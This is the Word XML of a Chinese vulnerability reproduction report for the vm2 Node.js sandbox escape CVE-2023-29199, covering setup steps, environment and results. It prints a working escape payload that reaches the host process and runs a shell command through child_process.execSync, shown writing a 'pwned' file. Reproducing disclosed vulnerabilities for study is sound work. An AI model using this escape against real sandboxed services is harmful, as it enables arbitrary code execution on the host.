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漏洞详情信息表"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">漏洞详情信息表</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">漏洞名称：vm2 安全漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CNNVD 编号：CNNVD-202304-1191</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CVE 编号：CVE-2023-29199</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">厂商：个人开发者</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">危害等级：高危</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">漏洞类型：沙箱逃逸漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">收录时间：2023-04-14 00:00:00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">更新时间：2023-04-26 00:00:00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">vm2 是捷克 Patrik Simek 个人开发者的一个 Node.js 的高级虚拟机/沙盒。以使用列入白名单的 Node 内置模块运行不受信任的代码。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">vm2 3.9.15 版本及之前版本存在安全漏洞。攻击者利用该漏洞绕过 handleException()并泄漏未清理的主机异常，在其中主机环境中执行任意代码。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="20"/>
    <w:bookmarkStart w:id="21" w:name="系统和软件环境配置详情信息表"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">系统和软件环境配置详情信息表</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">操作系统：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1003"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Arch Linux (6.3.3-zen1-1-zen)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">软件：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1004"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">node v20.2.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1004"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">yarn v1.22.19</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1004"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">vm2 v3.9.15</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="21"/>
    <w:bookmarkStart w:id="28" w:name="漏洞还原详细步骤"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">漏洞还原详细步骤</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="22" w:name="新建环境"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. 新建环境</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mkdir CVE-2023-29199</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">指令新建目录用于测试。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">yarn init</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">创建新的 nodejs 项目。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">yarn add vm2@3.9.15</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">安装带有缺陷的 vm2 版本。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="22"/>
    <w:bookmarkStart w:id="23" w:name="编写代码"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. 编写代码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">假设我们将 vm2 当作沙箱来运行任意代码，在披露中我们可以使用如下代码来绕过沙箱而获得整个程序的执行权限。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">```js</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">index.js</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">const { VM } = require(</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">vm2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">);</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">const vm = new VM();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">const code =</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">aVM2_INTERNAL_TMPNAME = {}; function stack() {     new Error().stack;     stack(); } try {     stack(); } catch (a$tmpname) {     a$tmpname.constructor.constructor('return process')().mainModule         .require('child_process')         .execSync('echo "you are pwned! $USER" &gt; pwned'); }</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">console.log(vm.run(code));</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">```</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="23"/>
    <w:bookmarkStart w:id="27" w:name="运行"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. 运行</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">node index.js</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">执行上面的代码之后，就可以发现当前目录下多出现了一个 pwned 文件，内容正好是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">you are pwned! swwind</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">（其中</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">swwind</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">是我的系统用户名）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="3533775" cy="1409700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="" title="" id="25" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="./figure/result.png" id="26" name="Picture"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeArrowheads="1" noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3533775" cy="1409700"/>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2023-05-29T01:04:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-05-29T01:04:00Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>